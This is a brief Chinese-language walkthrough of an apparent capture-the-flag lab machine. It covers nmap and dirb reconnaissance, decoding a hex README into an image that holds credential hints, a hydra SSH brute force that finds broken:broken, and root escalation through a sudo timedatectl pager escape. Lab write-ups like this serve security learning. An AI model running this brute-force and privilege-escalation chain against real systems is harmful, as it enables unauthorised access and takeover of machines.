一、信息收集
1、主机发现
nmap 192.168.236.0/24
2、端口扫描
nmap 192.168.236.172 -p- -A
3、目录扫描
dirb http://192.168.236.172
二、漏洞探测
访问80端口,发现一些文件
README.md 中是十六进制的值
将内容写入readme.md中,使用 xxd 转换
xxd -r -ps readme.md > readme.bin
查看文件,发现文件头为 JFIF ,是一张图片
将后缀修改为 jpg ,查看图片
一段留言,把上面的一些可能作为账号密码的字符拿下来,写个简单的字典,尝试爆破 ssh
Bob
BROKEN
avrahamcohen.ac
broken
三、GetShell
使用 hydra 进行爆破,得到账号密码
hydra -L users.txt -P pass.txt ssh://192.168.236.172
broken:broken
ssh连接
ssh broken@192.168.236.172
四、提权
查看具有root权限的命令
sudo -l
看到 timedatectl 可以执行root权限,执行命令,提权成功
sudo timedatectl list-timezones
!/bin/bash